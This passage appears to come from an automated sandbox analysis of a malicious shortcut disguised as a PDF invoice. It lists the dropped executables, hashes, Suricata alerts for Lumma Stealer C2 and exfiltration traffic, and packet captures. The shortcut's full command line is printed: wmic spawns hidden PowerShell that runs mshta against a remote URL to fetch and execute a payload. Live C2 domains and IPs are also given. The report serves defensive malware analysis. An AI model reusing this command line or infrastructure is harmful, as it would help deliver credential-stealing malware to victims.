                                                                                                                                                                                                                                              Preview:.vYZ...x[T.F.g\W.[...W..`.p.....Ha..ll.yP[`D.......Y.Iw.^pg.K.q.e..l.B...aR.......Y.l.U...c^x....vLm..ixf_Qm.J`A.y.rF......yT.LqSiEaaL`..A.L..UQ..o....q[..\yeWDv.....EXf^..........T.p..XZ..JlS..wLXSl...EU..i].....n......AFs.UN^[.w.]...ME.FfT..W...BO.].ul....BH...V....p..\._uy.B..w...M.srg..r.LU.XC.....^..`..w..Q.O....ARR.FX..Vk.OCp]....r.CQC.].M.j...JB...P.XI..`Gu`.iq....HY.xai.....jh.M.TfG.it.rm..^L_W..E..cU.B.hI.i.`i..qY[.CTGom.O.AUZ.TB.....r....k.Lm.....w.u..D.g.d..Sj.nK.bb...RN.SF..SR.w.VZ..p.m..OvKlL.N.qOIe...^._`..y...FGdq......q.s.p]Y.o.IM.s.Y....qEXTi.Q.gX.e...\N..F.m.H.w.mv.`.lm.].n[b.VmmT.FH.C.h..rhf[..rwr.DYg_..SN..L...Q..l....s..h..W..HSkgK..S..l..xn.FcL...n.Oi^gE...m.Q.....e..^jf.f.I...xMd.i..^kJfT`ERdiW..X.....n].t..i.d`.....uE...k...w.Aw.h.l..C..`eap.....`A_......ZpI...mX.h.biq.xjy.g...Dgo.Ta....p.EY....JYD..e.O.w...aKX...qrXUh.BG_..i.CvSUl.c.q...w......Sg..DI..qC.c..]Ym\].P..I....T..bhl\.o.[D..G..KP...\.........SI[.r.Sf.....hL..dx]acI.GE..\BTACV.].PQhe.P.....DPuvs..r.df

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):114905
                                                                                                                                                                                                                                              Entropy (8bit):7.668231614662199
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:jeoHTJykCVHX9YGQ9eet/vXZ7bBLZ/YOoEGs4Ga4L8/3F9q0a5wi0sbgQa6:yoH9e9YGBUwi0a54sbW6
                                                                                                                                                                                                                                              MD5:E6CA828043E98DD4CAF25C734E02B125
                                                                                                                                                                                                                                              SHA1:A557D937514A1430246D18D73EB32DFEF96851E3
                                                                                                                                                                                                                                              SHA-256:AA395834597F348B15C4A7A4FCFDBD28EB92A0A2D34AFE67AD8EB3E1E43E812C
                                                                                                                                                                                                                                              SHA-512:D6F470229AFF27285D6F0579958F7911095D942B11F97037E14170FB178874C34B8631BB1995943326B872934B457A2484E96AB1B7F85F972D0712DF26C6708E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 18 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/ViewerPreferences 147 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 15 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</XObject<</Image5 5 0 R>>/ExtGState<</GS7 7 0 R/GS10 10 0 R>>/Font<</F1 8 0 R/F2 11 0 R/F3 13 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.25 842] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 9352>>..stream..x..][s..~W....7r+<..N.V*U.%;Z.^....>P.D).HG..*..<.7.S....9g8...1.a....}.....h.....?...._<}......._l.|...^........j[U..V.1.V.M...w.......?7....m...Vo.KG..q.....{.....+.y|....{.'_...<x.....Z=.............[:"<BWU.u.i.....G~.}../.F......SH..M..>.}.6..C_=W..Um.......n......._ ..3..(.>YVo........R...m....\u.....W...>?....#....ss...=.W^..............3.k..n..E..^...%q...&..j.6.....Hw@.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\TCUINOVJ.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                                                                                              Entropy (8bit):7.984814257463729
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:+pBuC+EFiXOTjaeL7NoH4+98UbnQojwLLoOi/tehPE3FtMx:+pyEk+HaEW4NUbn/jmL04Fx
                                                                                                                                                                                                                                              MD5:38F517307990F8B2F9CEB8DE5BD1A528
                                                                                                                                                                                                                                              SHA1:586E0A8A4291BD07807DCB61DFEC7050B3010E13
                                                                                                                                                                                                                                              SHA-256:950C71D472A5AF01C0C0F9AA43D11CA955BE3A5F267ABFA13CC7027639B0D42B
                                                                                                                                                                                                                                              SHA-512:E6F0850A42F618AFA6559FC4FFEA935D9829E09FD8B25DEFAEEDCDCE3CA77F1E76DE85E8A8D65B46788D7140FABAF3FE9475B2926464B8A7D4280A8DAF98BD93
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                              Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.......................................................................................0...............................text............................... ..`.rdata...0...0...2..................@..@.data...,)...p.......H..............@....rsrc................P..............@..@........U.......SVWj'.....u..v..=`2A..6P......P..e......~..v8.^..3......h.3A.P..........P......P..p1A..E..E....;F.r......P.,f..Y.-..j...t1A...t$..l....3.9..wA.t...@....9D$.t..t$.Ph.....5.wA....2A.3.....D$..`...|$..u..@.....3.....D$...V...t...P.Q...^....T$.V.t$......f..BBFFf..u.^.L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q......3.9F.Y~.9F.~...f..Af..G@;F.|..6....Y.F..>f.$G..^._^[...U..QQ..lwA..uVj.j..E.P.5.wA...l1A...t>.E.;E.w6r..E.;E.s,j*.....P.He.....YYt...(wA.j.....@... .

                                                                                                                                                                                                                                              C:\Users\user\WebUI.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7994880
                                                                                                                                                                                                                                              Entropy (8bit):6.703465342581849
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:196608:639LxBBmYeZ12U8Blc/OwDlcXus9n0SJsv6tWKFdu9CZ:OLx6YeZ12TBlc/OwDlitJsv6tWKFdu9C
                                                                                                                                                                                                                                              MD5:42D6C8DC4853BC75E165840F2E3AF062
                                                                                                                                                                                                                                              SHA1:0CAE81999BEB48D72D54BD6C2AA4BD1195F7A8A6
                                                                                                                                                                                                                                              SHA-256:87850B43C89E0D8C132D7BE8DED5B075DFBCF9F4AC3802F6C9169EDBB168288A
                                                                                                                                                                                                                                              SHA-512:CBA53C9F6B46D4891C7C05BEE34FF87B64CA96C8607DD3332F7D0318721BFF90D5E14152BC29040E8F27DABA5516A8B23E880BFF911821A060609B9C6F9B3FA3
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............uF.uF.uFs..F.uF...F..uF.c.F.uF.c.F.uF.tF..uF...F..uF...F.uF...F.uF...F.uF...F.uF...F.uFRich.uF........................PE..L...A..R...........!.....^U..@%.......J......pU...............................z......nz...@..........................vq......Tq.......t.......................t..E...wU..............................gn.@............pU.D............................text...`]U......^U................. ..`.rdata..+....pU......bU.............@..@.data...H.....q..z...lq.............@....unwanted.....t.......s.............@..@.rsrc.........t.......s.............@..@.reloc........t.......s.............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\fnwp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):794013
                                                                                                                                                                                                                                              Entropy (8bit):7.9061967126983355
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:T6xK8IlPnUWetr9nIaD21C6L7Rb3xhqRVyjHIU0QEWJJeZmZeUc:mM8kcWONKnL7bhqRVyzIU0RYs8ZU
                                                                                                                                                                                                                                              MD5:6D9B330A77FFB52761857313E2797282
                                                                                                                                                                                                                                              SHA1:9A4738CF2B26C3596A11CF5170BD0816A56D5626
                                                                                                                                                                                                                                              SHA-256:08E62528AB5EB1CBDF31F2F46EEF3547E37F5B5164D1B9B92B3D40668472975E
                                                                                                                                                                                                                                              SHA-512:156C84807CEC72EEE292791B4BF8264D0D0571B13EC2F3B359561F27E99513015563E0761A9E36D8DB52B8A22021434BC90D630450C424963A439D7777A56B60
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:t.pY...EkoJ..bkg..N.v...]tP..PI..\sN.LOe.Jegth.u.GD][EB..V.Rj...`.P...k....ksJBfdYdf_....fQ......U....g..u.lDaC.O..R.G.QFE_.J.L.h..r.qw.e.`G..X..Rj.CZc...Ll....E..d[..M.......i..._..eH.F..w.Gi.WN.JPp.B.GVP.....XU.Jna..IPb.....\s.lyx.v.....rHG.W.]...GKry...rf...g.^LJK...w....XyX.k...v.aaw._..Gw...EL........YYrTD.JNRb.qvm...s..y..f..H.....DtO.e...K.......WK.p.L.YIMbjL....D.....\Idg...H....Z^.pj.H...ncj...f...[X..I.dx..x.EV...f..`.e.KW.....fWU`....L.w.xr...Fwx..Y.co.U..p..b.tdX.....].n...l.Q....X..XO.....uii.A..D....f.l..ddHJ.RRiP..E.WX.s..c..sX..r......D..u.U.o.\W.D.PU.njyMw.sC.JJbJ...C.C...B.....c.A.P..N..l_..kO\..Hj.....dIxjt..K..^]Nfv...Gn.e.....Q...RvHje.R].s.Ts.uQ\ep^.Bq..d.......n..oF.Nq...`.h...f.q[qnqM.pE.V.......e.S.u.].TqW.A..]m..y.G..e.VP..RU.`b.Jr..ki^.w[lI.uy...Ya..W..[y..My..FI^no.nC.....a...j.uF.X...q.Jt^.E.N.PWb.gCu.]..IEBQOSeKXB^..e...XE.f..`vlL..s.Rv......jcgvg.L..CT....S....d.B[tMWx..V...iYa.....o.w`...T..j.O.D...^..L..OtvR.W.....E.v`.P.Pv.OR.p.....D^BYL._.yE^..B.tf..q

                                                                                                                                                                                                                                              C:\Users\user\iScrPaint.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1909504
                                                                                                                                                                                                                                              Entropy (8bit):6.730805689885005
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:GpjwrP6yVgBd39sUUzFti4aTotmIT3SxLmNKbx:GpjwrP6yKTOUmi4aTo1NK9
                                                                                                                                                                                                                                              MD5:098AC4621EE0E855E0710710736C2955
                                                                                                                                                                                                                                              SHA1:CE7B88657C3449D5D05591314AAA43BD3E32BDAA
                                                                                                                                                                                                                                              SHA-256:46AFBF1CBD2E1B5E108C133D4079FADDC7347231B0C48566FD967A3070745E7F
                                                                                                                                                                                                                                              SHA-512:3042785B81BD18B641F0A2B5D8AEC8EF86F9BF1269421FB96D1DB35A913E744EAFF16D9DA7A02C8001435D59BEFB9F26BC0BBFA6E794811ABF4282ED68B185FE
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\iScrPaint.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...s..d..................................... ....@...........................!..................@......................P....@...F......8................;......8"...................................................L...............................text............................... ..`.itext..P........................... ..`.data........ ......................@....bss.....g...............................idata...F...@...H..................@....edata..P...........................@..@.tls....L................................rdata..............................@..@.reloc..8".......$..................@..B.rsrc...8............*..............@..@....................."..............@..@........................................................

                                                                                                                                                                                                                                              C:\Users\user\woy

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64950
                                                                                                                                                                                                                                              Entropy (8bit):4.515083558964412
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:RkNN3WO3yFEA8KV587xJxRaMv7+NHE8qsK4pezGNxzOW/Ro:0ZWO3yFEA8ECRRv7uk8qsK4kzGN9OWu
                                                                                                                                                                                                                                              MD5:DB9F61246773A0BA48516A9549603B06
                                                                                                                                                                                                                                              SHA1:6CB9FF25201C920D61FF861A687DC7FA1D321C18
                                                                                                                                                                                                                                              SHA-256:6B6D7477963EA3AA4028878716A918A3028D6452F1AB1CBF92B4F073FE81F973
                                                                                                                                                                                                                                              SHA-512:79AC6DEE0EB3B3F210230481695D6E7324018A329871F0A32D02480A7CECC4F31353C32A5B14E6E686288AB2E0AA5CCFA9103C89E212DB79591F06491FF7E0AB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.vYZ...x[T.F.g\W.[...W..`.p.....Ha..ll.yP[`D.......Y.Iw.^pg.K.q.e..l.B...aR.......Y.l.U...c^x....vLm..ixf_Qm.J`A.y.rF......yT.LqSiEaaL`..A.L..UQ..o....q[..\yeWDv.....EXf^..........T.p..XZ..JlS..wLXSl...EU..i].....n......AFs.UN^[.w.]...ME.FfT..W...BO.].ul....BH...V....p..\._uy.B..w...M.srg..r.LU.XC.....^..`..w..Q.O....ARR.FX..Vk.OCp]....r.CQC.].M.j...JB...P.XI..`Gu`.iq....HY.xai.....jh.M.TfG.it.rm..^L_W..E..cU.B.hI.i.`i..qY[.CTGom.O.AUZ.TB.....r....k.Lm.....w.u..D.g.d..Sj.nK.bb...RN.SF..SR.w.VZ..p.m..OvKlL.N.qOIe...^._`..y...FGdq......q.s.p]Y.o.IM.s.Y....qEXTi.Q.gX.e...\N..F.m.H.w.mv.`.lm.].n[b.VmmT.FH.C.h..rhf[..rwr.DYg_..SN..L...Q..l....s..h..W..HSkgK..S..l..xn.FcL...n.Oi^gE...m.Q.....e..^jf.f.I...xMd.i..^kJfT`ERdiW..X.....n].t..i.d`.....uE...k...w.Aw.h.l..C..`eap.....`A_......ZpI...mX.h.biq.xjy.g...Dgo.Ta....p.EY....JYD..e.O.w...aKX...qrXUh.BG_..i.CvSUl.c.q...w......Sg..DI..qC.c..]Ym\].P..I....T..bhl\.o.[D..G..KP...\.........SI[.r.Sf.....hL..dx]acI.GE..\BTACV.].PQhe.P.....DPuvs..r.df

                                                                                                                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                              \Device\ConDrv

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):160
                                                                                                                                                                                                                                              Entropy (8bit):5.095703110114614
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmJPFJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egmXeAin
                                                                                                                                                                                                                                              MD5:3E0D6A9EFD1FCFFDEDADE0FE4D1D1085
                                                                                                                                                                                                                                              SHA1:31714089B8B78B362799E49E62D18013F776B427
                                                                                                                                                                                                                                              SHA-256:31AEEC0E0C83EAEF0DC9EDD97D8B6A078669BBAF722834DC2E310D54E31A77D6
                                                                                                                                                                                                                                              SHA-512:BE08D7F42D5E6DCABAEB9DE700FEFC9A772399B6C6BA7E69446509B4BEC54F2DC7CCDC6EAC08DA7F0BF397DC3E46A5CD28640C3221804F69D86092524090A1E1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4592;...ReturnValue = 0;..};....

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                                                                                                                                              Entropy (8bit):2.568206802442521
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                              File name:Rechnung736258.pdf.lnk
                                                                                                                                                                                                                                              File size:1'899 bytes
                                                                                                                                                                                                                                              MD5:5bfe0ada17542af48b71b2bd2861b738
                                                                                                                                                                                                                                              SHA1:2a4a858db4aff6ba8d9da7b104cec8e45fb426a8
                                                                                                                                                                                                                                              SHA256:021feed3c450c435bdbd4167f81f4917fcecf38e1836e9bff3c32e0063f3baf5
                                                                                                                                                                                                                                              SHA512:3329cef8595d5a6153a353ba932058d9ab3108c6462025709be661749588b8b93ea5bb96ccc8b51e832d151812f42ec1a985bc9b86ece88747d59b45e1bb27d0
                                                                                                                                                                                                                                              SSDEEP:24:8AyH/BUlgKN4e0+/3dkWNBvLG3zqdd79dsHLIQ:89uGeTdlBzG3mdJ9
                                                                                                                                                                                                                                              TLSH:F04104186AF91B10F3F68E32587AB721CA7B7C4AED628F1D018146CD2425A10BD75F6B
                                                                                                                                                                                                                                              File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:72d282828e8d8dd5

                                                                                                                                                                                                                                              Static Windows Shortcut Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Relative Path:..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                              Command Line Argument:process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
                                                                                                                                                                                                                                              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                              2024-12-21T14:59:11.549244+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54971062.182.21.105443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:52.458854+01002058308ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (securesways .click)1192.168.2.5552951.1.1.153UDP
                                                                                                                                                                                                                                              2024-12-21T14:59:54.022416+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549803104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:54.022416+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549803104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:56.939866+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549803104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:56.939866+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549803104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:58.175252+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549815104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:58.175252+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549815104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:59.025544+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549815104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T14:59:59.025544+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549815104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:00.799468+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549821104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:00.799468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549821104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:03.593870+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549832104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:03.593870+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549832104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:06.068835+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549838104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:06.068835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549838104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:11.085708+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549849104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:11.085708+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549849104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:12.280466+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549849104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:13.970949+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549855104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:13.970949+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549855104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:18.946471+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549871104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:18.946471+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549871104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:19.811654+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549871104.21.16.1443TCP

                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:01.388335943 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:01.388458014 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:01.388571024 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:01.398253918 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:01.398293018 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:02.795172930 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:02.795248032 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.225085020 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.225148916 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.226263046 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.226331949 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.228986979 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.275378942 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.628422022 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.629394054 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.752717972 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.752749920 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.752798080 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.752842903 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.752899885 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.752938032 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.752960920 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.865992069 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.866065979 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.866079092 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.866122961 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.866168022 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.866168022 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.917057037 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.917102098 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.917174101 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.917211056 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.917241096 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:03.917303085 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.042586088 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.042634010 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.042696953 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.042742014 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.042773962 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.042792082 CET49704443192.168.2.562.182.21.105
